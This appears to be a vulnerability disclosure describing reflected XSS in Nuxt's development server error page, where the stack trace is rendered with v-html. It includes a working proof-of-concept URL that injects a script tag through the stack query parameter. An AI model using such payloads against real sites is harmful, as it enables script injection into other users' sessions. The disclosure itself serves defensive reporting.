The developer server unsafely renders the stack trace within errors. This can be manipulated by sending a specially crafted request.
The error-dev.vue
template, within @nuxt\ui-templates
uses the v-html directive to render the stacktrace section of the error.
<h1 />
<p />
<div>
<pre />
</div>
This would normally not be an issue, however nuxt provides a method for supplying the stacktrace VIA a specially crafted URL.
Navigating to /__nuxt_error?stack=%0A<script>alert("xss!")</script>
will produce XSS.
The first line of stack traces is removed, hence the %0A
.
https://stackblitz.com/github/nuxt/framework/tree/main/examples/essentials/hello-world?file=app.vue&theme=dark
Navigate to the url /__nuxt_error?stack=%0A<script>alert("xss!")</script>